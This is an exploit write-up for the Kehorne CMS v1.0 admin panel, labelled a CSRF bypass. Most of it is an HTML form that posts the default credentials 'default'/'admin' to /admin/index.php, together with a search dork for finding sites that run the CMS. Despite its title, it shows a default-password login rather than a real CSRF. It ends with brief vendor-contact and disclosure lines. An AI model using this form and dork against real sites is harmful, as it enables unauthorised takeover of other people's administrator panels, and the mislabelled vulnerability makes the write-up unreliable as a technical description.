Kehorne CMS version 1.0 suffers from a cross site request forgery vulnerability.
7876c6ade34f65bc85f60b867431987f0053357523f0490c265157c3f171eb5a
================================================================================
# Author: R3VAN_BASTARD
# Exploit Title: Kehorne CMS v1.0 <= CSRF ByPass Administrator Panel
# Vendor: http://www.kehorne.co.uk
# Status: FIXED
# Tested on: Windows 7
# Dork: "Website Designed by Kehorne"
================================================================================
<html>
<div class="logincontainer">
<div class="logo"></div>
<div class="loginbox">
<form id="login" name="login" method="POST" action="/admin/index.php">
<table width="200" border="0" cellspacing="5">
<tr>
<td width="29%">Username</td>
<td width="71%"><label>
<input type="text" name="username" id="username" value="default" />
</label></td>
</tr>
<tr>
<td>Password</td>
<td><label>
<input type="password" name="password" id="password" value="admin" />
</label></td>
</tr>
<tr>
<td> </td>
<td><label>
<input type="submit" name="button" id="button" value="Submit" />
</label></td>
</tr>
</table>
</form>
</div>
Done.
================================================================================
- Vendor has been contacted
- Hit Back And Patching
- Advisore release
- Credit: To All My Friends.
================================================================================